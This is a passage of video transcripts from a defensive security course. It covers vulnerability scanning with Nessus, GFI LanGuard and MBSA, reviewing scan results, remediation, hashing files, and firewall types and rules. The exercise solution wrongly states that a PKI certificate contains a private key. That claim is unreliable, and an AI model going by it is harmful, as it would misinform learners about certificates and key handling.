when I want this vulnerability assessment to be conducted. However, I will leave it on manual invocation,
which was the default setting. Under DISCOVERY on the left, I'm going to click on that link to determine
exactly how hosts are discovered. [He clicks the DISCOVERY subsection and its content is displayed.] Here
it's going to conduct a common port scan but I could choose from the list from other profiles such as Port scan
(all ports), or even I could choose Custom. [He points to the Scan Type drop-down list box.] I'm going to leave
it on Port scan (common ports). For ASSESSMENT, over on the left, [He selects the ASSESSMENT
subsection.] I can also determine what types of items I want to specify, in terms of what I want to scan for. So
here I'm going to choose Scan for all web vulnerabilities (quick) [He selects this option in the Scan Type drop-
down list box.] and down below, I can see exactly what it's going to do.
So let's go and Enable CGI scanning, it's going to start crawling from the root of the web site and so on. I've
got a few report options here I might be interested in, [He selects the REPORT subsection.] such as allowing
the results of the scan to be editable [He points to the Allow users to edit scan results checkbox.] or displaying
hosts that respond to ping, [He points to the Display hosts that respond to ping checkbox.] or displaying even
unreachable hosts within the range that I specified. [He points to the Display unreachable hosts
checkbox.] And on ADVANCED, if I click on that on the left, [He selects the ADVANCED subsection.] I've
got a few options here related to performance as I'm running the scan. So when I'm happy with my settings, I'll
go ahead and Save what I've configured, [He clicks the Save button at the bottom of the subpage. Now the My
Scans list in the Nessus Home / Scans web page includes the Basic Network Scan - Chicago Subnet 1 list
item.] because the next thing we'll do, because we didn't configure scheduling, is we'll have to invoke it
manually. We can do that from this list by clicking the Launch button, it looks like the play button. So I'm
going to go ahead and click on that [He clicks the Launch button adjacent to the list item.] and I can now see
the timestamp from when it started conducting this scan. At any point in time, while the scan is running, I can
click on this little Running icon. [He clicks the Running icon adjacent to the list item and the Basic Network
Scan - Chicago Subnet 1 subpage opens.] And will take me into another page that shows me what it's
discovered so far, in terms of the number of hosts, and any vulnerabilities it might have found on them so far.
So here we only see it's started scanning the first IP address in the range and it found one host, but we really
don't have much more. But as we wait a little bit longer we'll see this screen updating as it discovers more
hosts and vulnerabilities. Ideally no vulnerabilities, but that's why we're running this tool. So let's wait a few
minutes, and then we'll come back and see what it's found. So now that the scan's been running for a few
minutes, we can see it's discovered numerous hosts on the network. Now, most of these look good because
blue, according to the legend, is just informational messages about the device. However, any colors, like when
we start getting into the orange colors, or red if it finds critical vulnerabilities, that needs to draw our attention.
So here we've got a host that apparently has one, [He points to the host IP address 192.168.1.1.] there's a little
number one here, one medium vulnerability. Now to get details about what that is, I could click on the IP
address for that host over on the left. That's going to jump me into a page specifically about that device and
what's been learned so far, [This page displays information about the IP address such as the severity, plugin
name, and count.] bear in mind, the scan is still not complete. So here we've got a medium vulnerability that
was found related to the DNS Server Cache.
At the same time, I can also see over here, the IP address, the DNS name and when this scan was started for
this particular host. I can even download a report of found vulnerabilities here to a file, [This information is
available under the Host Details section.] so I can then deal with a remediation of those discovered issues.
Now, I'm going to go back to the scans screen, so I'll click on the Scans link at the top of the screen. [The
Nessus Home / Scans page opens.] At any point in time, I can go ahead and pause or stop that scan, [He points
to the Pause and Stop buttons adjacent to the list item under the My Scans list.] and after it's stopped, I'll get
an X here. I can even delete it in the future. However, I'm just going to click stop. Now it asks me if I'm sure I
want to stop the scan, now realistically, you want it to continue. However, in the interest of time here, we're
going to stop it. Another interesting thing we can do here in Nessus is go up to the Policies link, where we can
build a new policy. [He clicks the New Policy button in the Policies tabbed page and the Policy Library
subpage opens. It includes several template options.] Which really essentially let's build a custom set off
settings that we can base scans on. So here in my scanner templates, in this example, I'll choose Host
Discovery. [The New Policy / Host Discovery subpage opens. It is divided into two sections. The left section is
the navigation pane, which contains the BASIC, DISCOVERY, and REPORT subsections. The BASIC
subsection includes the General and Permissions options. The General option is selected by default and its
content is displayed in the section on the right. It contains two text boxes, Name and Description.] Then I'm
going to call this CustomHostDiscovery1. And on the left I'll click DISCOVERY, to see exactly how it's
discovering hosts on the network. [The content of the DISCOVERY subsection includes the Scan Type drop-
down list box.] Sometimes you might want to first just identify what it is exists on the network prior you
actually conduct a detailed scan of those devices. So here I'm going to choose OS Identification [He selects
this option in the Scan Type drop-down list box.] for OS fingerprinting, and I'm going to click Save. So now
I've got a saved policy called CustomHostDiscovery1, [The Policies tabbed page now includes the
CustomHostDiscovery1 item under the All Policies list.] but how do I use this? Well, what I need to do is click
on the Scans link up at the top. And when I click New Scan on the left, if I scroll all the way down to the
bottom, I'm going to see my custom policies, such as my CustomHostDiscovery1 policy. [This policy appears
under the User Created Policies section in the Scan Library subpage.] So from there, if I load that up by
clicking on it, I can build a new scan, schedule it, and then start conducting my vulnerability assessment based
on these customized settings.
Objectives
[Topic title: Common Vulnerability Scanning Tools. The presenter is Dan Lachance.] In this video I'll talk
about common vulnerability scanning tools.
The goal of vulnerability scanning is to identify and address weaknesses. Although unlike penetration testing,
we aren't testing the behavior when we try to exploit those weaknesses. So therefore, vulnerability scanning is
quite passive and shouldn't disrupt production systems. We need to have a database of known security
misconfigurations, common attack vectors, known suspicious activity, and also known suspicious activity
remnants within the database that is used by the vulnerability scanning tool. Now, this database, of course,
needs to be updated as these things change over time. With a noncredentialed scan, we get similar results that
would be achieved when a malicious user does scanning during reconnaissance. Whereas a credentialed scan
has access to systems. And it really kind of mimics a compromised account within the company and what
could be learned using that compromised account. Vulnerability scanning tools often have other abilities, such
as the ability to correlate scan results with past activity to see what's changed. It could also have the ability to
identify false positives that might even be configurable in some tools. We can also compare scan results with
best practices, and in some cases, auto-remediate devices that don't adhere to best practices. We can also
compare current scan results with previous scan results overall. This way, we can plan response plan priorities
when it comes to incident response.
There should always be ongoing scans, since the threat landscape is changing all of the time. Some
vulnerability scanning tools are command line based. Others have a GUI, like GFI LanGuard, which I'm using
here. [The configuration tabbed page of the GFI LanGuard 2014 window is open.] Regardless of the solution
of your choice, they have a lot of commonalities in terms of their functionality. For instance, here under
Agents Management on the left, [The presenter points to the Agents Management option under the
Configurations section, which is selected by default. Its content is displayed in the content section.] I can
deploy agents to other computers for further scanning. I also have the option on the left of configuring a
Scanning Profile. For instance, I'll click the Vulnerability Assessment scanning profile on the left. [He clicks
the Vulnerability Assessment subnode of the Scanning Profiles node under the Configurations section.] Then
over on the right, maybe for High Security Vulnerabilities, [Its content includes the High Security
Vulnerabilities list item. There is the Edit this profile link adjacent to this item.] I'll click the Edit this profile
link. [The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens.] So essentially, I can customize
what I am scanning for within my Vulnerability Assessment. [The dialog box includes the Profile categories
section, which further includes the Vulnerability Assessment option.] So here we've got hundreds upon
hundreds of High Security Vulnerabilities that get checked. [The content of the Vulnerability Assessment
option is displayed in the content section of the dialog box.] And I have the option, of course, of deselecting
some if I don't want to check them. The more things you're checking for, the longer it takes. But then at the
same time, the more thorough the scan results that you get in the end. Over on the left, I also have the option of
Scheduling Scans. [He right-clicks the Scheduled Scans node under the Configurations section and selects the
New scheduled scan option from the shortcut menu. As a result, the New scheduled scan wizard
opens.] Scheduling scans is important so that we scan either a single computer or a bunch of computers on the
network or the whole network. So that we are keeping up to date with any newer threats or newer suspicious
activity.
We also have the option in many of these vulnerability scanning tools to store an application inventory. [He
clicks the Applications Inventory node under the Configuration section and its content is displayed in the
content section.] It will scan for software installed on devices so it can give you recommendations on whether
or not something should be removed or configured differently. There's also software updating, which I've
clicked on in the left hand-navigator here, [He clicks the Software Updates node under the Configuration
section and its content is displayed in the content section.] where we can configure software updates that
would be automatically downloaded or autodeployed to machines that are missing them. All vulnerability
scanners have some kind of an option for alerting. [He clicks the Alerting Options node under the
Configuration section.] For example, sending an email message to administrators by connecting to a mail
server. Vulnerability scanners always have a database that they use when they conduct vulnerability
assessments, and that database must be kept up to date. [He clicks the Database Maintenance Options node
under the Configuration section.] But, for example, if I were to go into Program Updates on the left in this
tool, [He clicks the Program Updates node under the Configuration section and its content is displayed in the
content section.] then I can see I've got options for the Vulnerabilities Database Update, and I can see when it
was last kept up to date. You'll find common vulnerability scanning tools from Qualsys. Nessus is a common
open-source vulnerability scanning tool that we'll take a look at in another Linux demonstration. There's
OpenVAS, Nexpose, Nikto, Microsoft Baseline Security Analyzer, and the list goes on and on and on.
Objectives
[Topic title: Scan for Vulnerabilities using Microsoft Baseline Security Analyzer. The presenter is Dan
Lachance.] There are quite a lot of tools out there that will let you conduct a vulnerability scan of a Unix,
Linux or Windows host. In this video I'll demonstrate how to use the free Microsoft Baseline Security
Analyzer, or MBSA, to conduct a scan.
So I've already downloaded and installed the Microsoft Baseline Security Analyzer. You can see I've got a
shortcut icon here on my desktop. So I'm going to go ahead and double-click to launch the tool. [The Microsoft
Baseline Security Analyzer 2.3 window opens. It includes a section, which is titled Check computers for
common security misconfigurations. This section includes the Scan a computer and Scan multiple computers
options.] Now here, MBSA can be used to scan a single computer for vulnerabilities or multiple computers.
Here, I'll choose Scan a computer. [A page opens that is titled Which computer do you want to scan? It
includes the Computer name and IP address drop-down list boxes. It also includes the Security report name
text box.] It automatically picks up the local computer name, but I could also have specified the IP address.
The report that it generates will use these variables where %D is for the name of the domain, %C is for the
computer name and so on. I'm going to accept the defaults for that. The options that have selection marks by
default include to check for Windows admin vulnerabilities, weak passwords, IIS administrative
vulnerabilities, SQL server administrative vulnerabilities. And just to check that security updates have been
installed successfully on the host. [These are the checkboxes present under the Options section of the
page.] So at this point, I'm going to go ahead and click the Start Scan button in the bottom right. And we can
now see that it's getting the latest security update information from Microsoft online and it's begun to scan. [A
page opens that is titled Report Details for QUICK24X7 - CM001.] So now that it's had a chance to scan, we
can see the results of our security vulnerability scan on this host, specifically called CM001.
So as we scroll down further through the results, we can see where there were problems. In this case for SQL
Server, we're missing security updates, as well as for Windows and for Silverlight as well as System
Center. [These issues are displayed under the Security Update Scan Results section.] But as we keep going
through, we'll get a sense of what was scanned and where the problems are. Such as automatic updates not
being installed in the computer even though there are outstanding updates or more than two administrative
accounts found on the machine. Password settings, Windows Firewall problems, as well as file system
scans. [These issues are displayed under the Administrative Vulnerabilities section.] Checking to see which
services are currently running but may not be necessary because they're not being used. [He points to the
Additional System Information section.] IIS web server issues that we have to address. In this case, there are
none, they all have a green shield symbol. And as you can see as we scroll down, we can see all of the items
that were tested. In this case for SQL Server, we have a number of items like SQL service accounts and
password policies. So different vulnerability scanning tools will scan a single host, as we've done here, or
numerous hosts and will report on different items. Down at the bottom, of course, here we can print the report
or copy it to the clipboard so we can work with this data in other tools. [These options are available at the
bottom of the page.]
In this video, we learned how to scan a host for vulnerabilities using the Microsoft Baseline Security Analyzer.
Objectives
[Topic title: Review Vulnerability Scan Results. The presenter is Dan Lachance.] In this video, we'll take a
look at the result of a vulnerability scan.
Now, there are plenty of tools that can conduct vulnerability scans. Here we've got GFI LanGuard 2014, [The
Scan tabbed page of the GFI LanGuard 2014 window is open.] where we've already conducted a scan of an IP
range. And we can see by looking at the Scan Results Overview that it found numerous hosts on the
network. [He points to the Scan Results Overview section in the Scan tabbed page.] Now, the host that we're
currently running this from is a different color listed down here towards the bottom left of the listing of hosts.
However, what I'm going to do is pick on, let's say, the computer here with the name of LIVINGROOM,
which apparently is running Windows 10. And I'm going to expand the Vulnerability Assessment on that host
in the left-hand navigator. Then I'll click Low Security Vulnerabilities. [In the Scan Results Overview section,
he clicks the Low Security Vulnerabilities subnode under the Vulnerability Assessment node of the
192.168.1.94 address. Its content is displayed in the Scan Results Details section.] Here it talks about HTTPS,
running, and HTTP, running. So in other words, there's a web server. Now, if that's not what you expected
because that might be a workstation, that's a problem. It's got a larger attack surface than it really needs. And
we all know that to harden a system, you should really only make sure it runs what is absolutely required and
nothing more. If I were to click Potential Vulnerabilities on that host, [He clicks the Potential Vulnerabilities
subnode under the Vulnerability Assessment node of the 192.168.1.94 address and its content is displayed in
the Scan Results Details section.] it talks a little bit about ports that might be open and might be used by a
Trojan. In this example, for example, TCP port 9090. Now, if I open up, for that same host, the Network and
Software Audit category and expand Ports, I can see the open ports here. [He clicks the Open TCP Ports
subnode under the Network and Software Audit node of the 192.168.1.94 address and its content is displayed
in the Scan Results Details section.] So port 80 for a web server. Because it's a Windows machine with file
and print sharing, I see ports 135 and 139. But as I go further down, I can also see that port 9090, again, is
listed.
Now, this is a specific packet sniffer tool. And it could spell problems. Because it could be some kind of a
Trojan listener. Or it could be some kind of a back door or spyware. So this should be setting off alarm bells.
Because we might say that that is a workstation that shouldn't be running a web server, let alone some other
remote packet sniffer on port 9090. Now, when you're looking at the results of a scan, of course you're going to
want to save it to make sure it's available for historical purposes or over time so that you can start to think
about your remediation actions. So of course, in this tool, on the upper left drop-down arrow icon [He clicks
the Main Menu icon at the top of the GFI LanGuard 2014 window. A list of options appears that includes the
File option.] and under File, [A flyout appears that includes the Save Scan Results and Load Scan Results
from options.] I could choose to save the scan results. And often, it saves it in a format such as XML or CSV,
or even to a database with some tools. And in the future, you can load the scan results. However let's take a
look at couple of other options after having run a vulnerability scan. So under the Remediate tab in this
particular tool, it's showing me things that really need attention. [The Remediate tabbed page includes the
navigation section on the left. It contains the Entire Network node, which is selected by default. Its content is
displayed in the section on the right. It includes two tabs, Remediation Center and Remediation Jobs. The
Remediation Center tabbed page includes a section that is titled List of missing updates for current
selection.] Now, on the left, I can choose specific hosts as a result of the scan. But here I've got Entire
Network selected, so it applies to all of them. And it's talking about a lot of Windows updates and Service
Packs that really should be applied. [The list includes the Critical Update and Service Pack nodes.] So for
example, under Critical Update, there are two updates here, such as one here for Server 2012 R2. And if I
expand it, I can see which hosts are missing it. Now, notice, I do have the option to remediate. Which means,
in this case, apply the updates. So not only is this tool doing a vulnerability scan, but it gives me the ability to
do something about what was found. If I were to go under the Reports tab in this particular tool, [The Reports
tabbed page includes the navigation section on the left. It contains the Entire Network node, which is selected
by default. Its content is displayed in the section on the right. It includes two tabs, Settings and Search. The
settings tabbed page includes the Reports section.] there are numerous reports that are available. And you can
run them based on the results of your scan. So for example, maybe I'll take a look at the Network Security
Overview report. [This node is selected by default in the Reports section. As a result, the section adjacent to
the Reports section is titled Network Security Overview.]
Now, on the left, again, I've got the Entire Network selected. So everything that was found through the result
of my scan settings. And if I generate the report by clicking the Generate Report button, [This button is present
in the Network Security Overview section.] let's see what we get. [Another tab, Network Security Overview,
gets added in the content section.] We should have some kind of a general security overview report based on
all of the machines that were scanned when we conducted our vulnerability assessment. Okay, so after a
minute, we've got our Network Security Overview report. And if we scroll down here, it's really nicely done.
We can see we've got nice, colorful charts. Now, it's not about the colors or the pretty pictures, it's about what
they represent. So our vulnerability level overall is flagged here as being medium. That is not good. We can
also see a pie chart here that shows us our vulnerability distribution in terms of high, medium, and low. [This
information is displayed under the Network Security Overview section.] As we scroll further down, we start to
see a breakdown. So apparently, we have no firewall issues out of what was scanned on our network. But we
have a lot of missing updates, which is a problem. [This information is displayed under the Security Sensors
section.] So as we scroll further down, we could read more and more about that report. So we've got all kinds
of great things that we can do with this. Now, you also have the option of choosing the format that you want to
use for an attachment by sending this through email or by saving it. So if I click the little icon with the floppy
disk, I see that the format is set to PDF. [These icons are present at the top of the Network Security Overview
tabbed page.] So if I were to actually click right on the icon itself, it gives me PDF Export Options. [The PDF
Export Options dialog box opens.] So we can save the report in various ways. Of course, you've also got
options available towards the upper left here, where you can search through the report for something specific
or actually print it on paper. Now, there are many other reports. We're not going to go through all of them. But,
for instance, if we're working with card holder data, like debit and credit cards, then we would be very
interested in PCI DSS compliance. So here, maybe I'll choose PCI DSS Requirement 1.2 Open - Ports. [He
selects the PCI DSS Requirement 1.2 - Open Ports subnode under the PCI DSS Compliance Reports node in
the Reports section of the Settings tabbed page. As a result, the title of the section adjacent to the Reports
section gets changed to PCI DSS Requirement 1.2 - Open Ports.] And I'll click Generate Report on the
right. [This button is present in the PCI DSS Requirement 1.2 - Open Ports section. Another tab, PCI DSS
Requirement 1.2 - Open Ports, gets added in the content section.] So really, these kinds of vulnerability
scanning tools have a lot of reporting capabilities. It takes a lot of the manual grunt work away from us, so we
can spend more time focusing on actually doing what we should be doing, securing the network.
So as I scroll down through here, I have a listing per each computer for TCP and UDP ports. Now, a -1 under
Process ID means it's not even open on that host. [He points to the TCP Ports and UDP Ports sections under
the PCI DSS Requirement 1.2 - Open Ports tabbed page.] But as we scroll further down, in this case, I can see
the computer is CM001. We've got a number of open TCP ports. And that might be required legitimately. But
it's a great report that quickly shows us the port utilization, in this case, for PCI DSS compliance.
Objectives
[Topic title: Vulnerability Remediation. The presenter is Dan Lachance.] In this video, I'll discuss
vulnerability remediation. It's one thing to identify vulnerabilities, but it's another to remove or mitigate that
vulnerability.
We address identified vulnerabilities ideally before malicious users do, and we might be required to do this for
legal or regulatory compliance reasons. So ideally, we'll have an automated schedule by which we get
vulnerability scan results so that we can identify these vulnerabilities. Manual remediation is possible. So for
example, if we discover that Remote Desktop is enabled on crucial Windows servers and we don't want it
enabled, then we could manually turn off Remote Desktop on each and every server that has that configuration.
Of course, enterprise class tools will always have a way to automate this remediation. Now it can also include
things like missing software patches, security misconfigurations, even the detection of malware where we've
configured it to automatically quarantine or remove the offending software. Vulnerability remediation allows
us to prioritize our vulnerabilities. We can then determine the business impact if those vulnerabilities were to
be exploited. So business process interruption, or it could even impact in a different way such as by degrading
IT system performance. Sandbox testing allows us to have a controlled environment to observe the
effectiveness of a remediation.
So when the IT technicians are testing vulnerability remediation, whether it be manual or automatic, this
should be done in a controlled environment. Often, it's done in a virtualized environment. Whether you've
already got that available on premises on your own equipment, or whether you're doing it in the cloud where it
takes only a few moments to spin up virtual machines to test things. When we implement remediation, we have
to think about remediation inhibitors. Some inhibitors include cost. It might be too expensive to pay for the
time for someone to get this configuration for auto remediation, for example, up and running. There's also
complexities. Now really, it's like anything that's worth doing. If you have the time to focus on something
properly from the beginning, so to do it right the first time, really, configuring auto remediation is not really
that complex. Now there are laws and regulations that might stipulate that we must enable auto remediation.
As an example, consider a configuration baseline here in Microsoft System Center Configuration
Manager. [The Baseline tabbed page of the System Center Configuration Manager window is open. It includes
the Assets and Compliance section.] A baseline contains numerous settings. In this case, we're checking
registry settings for a line of business apps. Now if I were to right-click on that configuration baseline, and if I
were to choose Deploy to apply it to a collection of devices, [The presenter right-clicks the Check client
Custom LOB App settings subnode under the Assets and Compliance section and selects the Deploy option
from the shortcut menu. As a result, the Deploy Configuration Baselines dialog box opens.] one of the things I
would notice is I have the option to remediate noncompliant settings when supported. [The Remediate
noncompliant rules when supported checkbox is present in the Deploy Configuration Baselines dialog
box.] So for instance, if we've got specific settings for an application, and maybe those are simply registry
entries, then we could auto-remediate that if it would make that application more secure as an example. Now to
finish this example, I would have to specify a collection down here by clicking the Browse button of users or
computers, [The Browse button is present adjacent to the Collection field under the Select the collection for
this configuration baseline deployment section. As a result, the Select Collection dialog box opens. It includes
a drop-down list box.] in this case devices [He selects the Device Collections option in the drop-down list
box.] where I want this done. So maybe I'll choose the All Systems collection. So we can deploy our
configuration baseline with auto-remediation to the devices of our choosing. On a larger network, it's a good
idea to have some kind of central way to deploy remediations, even if that's in the form of updates, as opposed
to going to each system one at a time. So we also need a way to track progress and run reports on either the
success or failure of implementation of remediation solutions.
So, overtime, we can also run reports or future scans to track the effectiveness of any fixes that have been
remediated. And we can update organizational security policies, or documentation, even that used by training
for new user on-boarding as required.
Objectives
Exercise Overview
[Topic title: Exercise: Describe Ways of Reducing Vulnerabilities. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining the difference between symmetric and asymmetric encryption.
Then after that you'll explain the purpose of Identity Federation, followed by describing the contents of a PKI
certificate. And then it's on to the action, where you'll compute a file hash using Windows. And you'll do the
same thing except you'll compute the file hash using the Linux operating system. At this point, pause the
video, perform each of the exercise steps and then come back to view the solutions.
Solution
Symmetric encryption uses the same key for encryption and decryption.
The key is called a shared secret. But it doesn't scale well because it's difficult to securely transmit this key to
multiple users. With asymmetric encryption, two keys are used, one for encryption and one for decryption.
Unique mathematically related public and private key pairs are issued to users' devices or applications. Where
the public key is used to encrypt and the private key is used to decrypt. Identity Federation allows us to use a
centralized identity provider that supports single sign-on. Applications have to be configured to trust the
identity provider. And likewise, the identity provider must be configured to trust applications. After successful
authentication, the result is a digitally signed security token from the identity provider. Applications verify that
signature authenticity before allowing resource access. So with Identity Federation it removes the need then for
multiple sets of credentials. Among other items, a PKI Certificate will contain the digital signature of the
issuing Certificate Authority.
It will include the subject name, which might be an email address or the URL of a web site. It will include a
public key, a private key, key usage details, as well as an expiry date. We can open up PowerShell in Windows
to generate a file hash of a file. We can use the get-filehash commandlet followed by the name of the file.
Here, I've got a text file called Project1.txt. [He executes the get-filehash .\Project1.txt command.] Notice that
we've got the hash visible here. Any changes made to the file will result in a different hash value if we run the
get-filehash commandlet in the future. In the Linux environment, I can use the md5sum command to generate a
file hash. Here I've got a file called log1.txt. So I'm going to type md5sum log1.txt. [He executes this
command in the root@kali command prompt window.] And here we can see the resultant hash, which will be
different if the contents of log1.txt change.
Table of Contents
After completing this video, you will be able to recognize the purpose of various types of firewalls.
Objectives
[Topic title: Firewalling Overview. The presenter is Dan Lachance.] In this video I'll do a firewalling
overview. Firewalls come in either hardware or software form and their general purpose is to control the flow
of network traffic into or out of a network or even individual host.
Now we can configure our firewalls with on-premises equipment or we can do it, if it's supported by a public
cloud provider, in the cloud. Firewall solutions from Palo Alto Networks also include virtual machine
appliance firewalls that are pre-installed and require only custom configuration. Now stateful firewalls are
designed to track connection state, or sessions, as opposed to each individual packet within the session. Now
this is considered more secure than a stateless firewall which does just that, it tracks each individual packet and
does not have the capability to track a session. All computing devices should really have a firewall solution
installed. This includes servers, desktops, laptops, tablets, and of course, smartphones. A packet filtering
firewall is one that examines packet headers as seen pictured here on the right-hand side of the screen. [The
following information is displayed: source port : https (443), Destination port: 55940 (55940), open square
bracket stream index: 38 close square bracket, Sequence number: 91765 (relative sequence number),
Acknowledgement number: 19197 (relative ack number), Header length: 32 bytes, Flags: Ox10 (ACK),
window size: 309 ] So for instance, in this packet header, we see a source and a destination port, a sequence
number, an acknowledgement number, which means it must be a TCP header. We see things like header
length, and so on. So packet filtering firewalls can look at many of these types of fields to decide whether
traffic is allowed or denied. So by looking at things like the IP protocol ID, source and destination IP address,
as we see in our picture here on the screen, the source and destination port number, maybe the ICMP message
type or additional IP options and flags. A web application firewall is a little bit more detailed because it's
designed to really dig a little bit deeper in the packet payload beyond just the headers.
It's often referred to as a WAF, a W-A-F, and it is specific to HTTP connections, whereas packet filtering
firewalls can look at any type of traffic. Another type of firewall is a proxy server. It's designed to retrieve
Internet content for internal clients that request it, so it's really masking or hiding the true identity of those
requesting clients. Another benefit of a proxy server is content that is retrieved can be cached to speed up
subsequent requests. A reverse proxy server listens for connection requests, for example from Internet clients
for a given network service such as a web server. So for instance, the proxy server might listen for TCP port 80
web site connections. And then what it will do is take those incoming connections from the Internet and
forward them to an internal host, a web server, listening elsewhere, ideally on a different port number. But it
doesn't have to be a different port number. Address translation is another way to firewall where it hides the
internal identity of hosts. However, routing needs to be enabled on your translation device and the hosts that
need to use that translation device. For example, if you're going to be using port address translation to get a
bunch of clients out on the Internet, they need to point to that translation device as their default gateway.
Network address translation, often called NAT, means that we've got multiple external-facing public IPs that
each map to a different internal private host IP. So we're protecting the true identity of those internal hosts,
while allowing incoming connections from the outside. Port Address Translation is often referred to as PAT.
This is where we can allow multiple internal clients to access the Internet through a single public IP address
configured on the PAT device. We then have to consider encrypted traffic when thinking about firewalls. So,
for example, if packet headers are encrypted, firewalls won't be able to read them. Now, there are some
exceptions.
Some firewalling tools will allow you to inject some kind of a certificate or key to decrypt transmissions. But
for the most part, when we talk about encrypted network traffic, it's not the headers that are encrypted. Usually
we're talking about the payload or the actual data that is encrypted. We should also consider the use of a
variety of firewall vendor solutions to increase security. So for example, if one of our firewalls gets
compromised by a malicious user they won't be able to use that same exploit against another firewall in the
enterprise because we would be using a different vendor's solution. We should also consider how we're going
to have a central standardized way to configure and deploy firewall settings to numerous devices. We might do
this through scripts, so whether it's a Linux Shell Script or a Windows PowerShell Script. We might even use
PowerShell Desired State Configuration, or DSC, to configure firewall settings on multiple devices, including
Linux. Or if you're in an Active Directory environment, you might consider the use of Active Directory and
group policy to essentially configure the Windows firewall for Windows devices.
After completing this video, you will be able to recognize how firewall rules are created based on what type of
traffic should or should not be allowed.
Objectives
recognize how firewall rules are created based on what type of traffic should or should not be allowed
[Topic title: Firewall Rules. The presenter is Dan Lachance.] In this video I'll talk about Firewall Rules.
Firewall Rules control network traffic flow. Traffic is either allowed or denied on a per-network interface
level. A firewall appliance, whether it's a server, physical or virtual, with multiple network interfaces or a
router, is going to have more than one interface, so we then can control the rules and tie them to a specific
interface. So the traffic can be coming into an interface or it could be leaving an interface, and when we
configure Firewall Rules, depending on the product that we're using, we'll have to specify that distinction.
Firewalls can be network based, so we have to think about the placement of the firewall appliance, so that it
can see all the traffic that it potentially would allow or deny. And of course, every host on the network, be it a
server, a laptop, or a smartphone, and so on, should have a host based firewall configured, in addition to our
network based firewall solutions. With Firewall Rules we should have a deny all traffic by default rule.
Then we would add rules to allow traffic only as we need them. So for instance if we need to allow HTTP
traffic then we could add a rule to allow that. But if any packets come in through the firewall that don't match
that HTTP rule then our deny all by default would kick in. Rules are processed using a top down approach. So
the first matching rule, so if there's some kind of criteria that matches what's in a packet, it gets executed and
no further rules get checked. So the last rule then in your list of rules should be a deny all. Some products will
actually display this because it's there automatically whereas others won't display it even though it is effective.
Here on the screen we see some examples of inbound rules. [A table with six columns and four rows is
displayed. The column headers are Allow/deny, Protocol type, Source, Destination, Port, and
Interface.] Where we get to decide in the left most column whether we are allowing or denying traffic. Notice
our last rule at the bottom denies all protocols from all sources going to all destinations for all interfaces.
However, our first rule allows TCP traffic from a specific source subnet of 172.16 with a 16 bit subnet mask.
And it allows that type of traffic to a specific host, in this case 172.16.0.56 for port 22 which is used for SSH
remote administration. And that's allowed on our firewall device through interface Ethernet zero.
Now we can also see the second example allows TCP traffic from all sources to all destinations as long as the
port number is 443, so HTTPS secured web traffic. And that again is tied to interface eth0. Our third rule
allows UDP traffic from any source to a specific destination going to port 53. Now if you recall, DNS client
queries are sent to UDP port 53 on the DNS server. So this is allowing DNS server queries from clients to
reach host 172.16.0.100. We should also consider whether or not we're going to log firewall actions, whether
packets are accepted or dropped because they don't meet the conditions that were specified in rules. If we're
going to turn on logging, then we probably want to turn on log forwarding so that our log information is stored
on another host as well. So if the firewall appliance itself gets compromised, while the logs can't be trusted of
course, we've got a copy elsewhere on a trusted host. In our logs we also have to decide whether or not we
want to see IP addresses for the data that we're logging to the firewall. Or, whether we want to do reverse DNS
name lookups to see the actual DNS names of the hosts connecting through the firewall. Now in many cases
you probably don't want to use reverse DNS name lookups while the log information is being generated,
because it's a little too resource intensive and takes time to do the reverse lookups. So instead, another option is
to have IP addresses of hosts logged in the firewall logs. And then if you need to when you're analyzing the
logs later, you can do the reverse DNS name lookups to get the names of the hosts if that's helpful. And that
could be a manual or an automated process. In this video we talked about Firewall Rules.
[Topic title: Packet Filtering Firewalls. The presenter is Dan Lachance.] In this video, I'll discuss packet
filtering firewalls. Packet filtering firewalls are also called Layer 4 firewalls.
This is because they are designed to examine packet headers, specifically things like UDP and TCP headers,
which map to Layer 4 of the OSI model. So therefore, packet filtering firewall cannot examine packet payload.
It can't look at the actual data, such as a specific URL that the user is connecting to, or a specific HTTP get
request. So therefore, there are restrictions for certain website, or data within packets, that are simply not
possible with packet filtering firewalls. Packet filtering firewalls can be stateless, where each individual packet
is seen as a separate connection. Also, a packet filtering firewall might be stateful, where it tracks packets
within a session.
When we configure a packet filtering firewall, we allow or deny traffic based on criteria. Which includes
things such as an IP protocol ID, which implies what type of packet this really is. Or a source and destination
IP address that specifically would apply to Layer 3 of the OSI model. We might also have a source and
destination port number, an ICMP message type, IP options and flags, and so on. Pictured on the screen, we've
got a red arrow pointing to the headers within a packet capture. [Dan refers to the following information
displayed on screen: Frame 91 (453 bytes on wire, 453 bytes captured), Ethernet II, src: 90:48:9a:11:bd:6f
(90:48:9a:11:bd:6f), Dst: 14:cf:e2:9f:9b:e7 (14:cf:e2:9f:9b:e7), Internet Protocol, src: 192.168.0.8
(192.168.0.8), Dst: 192.229.163.25 (192.229.163.25), Transmission Control Protocol, src port: 57683
(57683), Dst Port: http (80), seq: 400, Ack: 56918, Len: 399, Hypertext Transfer Protocol. ] The headers
begin with the Ethernet II header, which is containing information such as the source and destination MAC
address. We then see the Internet protocol or IP header, which, among other things, contains the source and
destination IP address. We can also see the Transmission Control Protocol header here in our screenshot, the
TCP header. Which, among other things, shows us the source and destination port for the connection, as well
as things like sequence and acknowledge numbers. Finally, we can also see the Hypertext Transfer Protocol
header, which is selected.
But down at the bottom in this packet capture we see the actual hexadecimal representation of that data, or
payload, on the left, and the ASCII equivalent on the right. So a packet filtering firewall will not be able to go
in and read that payload as we see it at the bottom of the screen. So again, it can't take a look at a file that a
user requested from a website. So a packet filtering firewall then, really applies to Layers 3 and 4. So when we
say it's a Layer 4 firewall, it applies Layers underneath it like 3. It can deal with protocol types, IP addresses,
port numbers, and so on. In our example on the screen we've got 3 firewall rules. The first rule is an SSH TCP
port 22 rule, to allow SSH remote administration traffic. [A screenshot of a web page is displayed. The page
displays a table with many columns and three rows. Some of the column headers are Rule#, Type, Protocol,
Port Range, Source, Allow/Deny. The table displays three types of rules. The Add another rule button is also
displayed.] We can see that we can specify a source, which in this case is an entire subnet, 172.16.0.0/16. And
of course, our rule is set to allow. Below it we are allowing HTTPS port 443 traffic from any source. And our
last rule here is denying all traffic from all sources. Common packet filtering firewall products include
configuring network access control lists, or ACLs, on your router, whether you're using a Juniper or Cisco
router. You can also configure the Windows firewall solution, or you could use the Linux and Unix iptables
command. Or any newer derivative, such as the FirewallD Daemon. Or you might use other tools, such as
Check Point Firewall-1, the list goes on, and on, and on. In this video we discussed packet filtering firewalls.
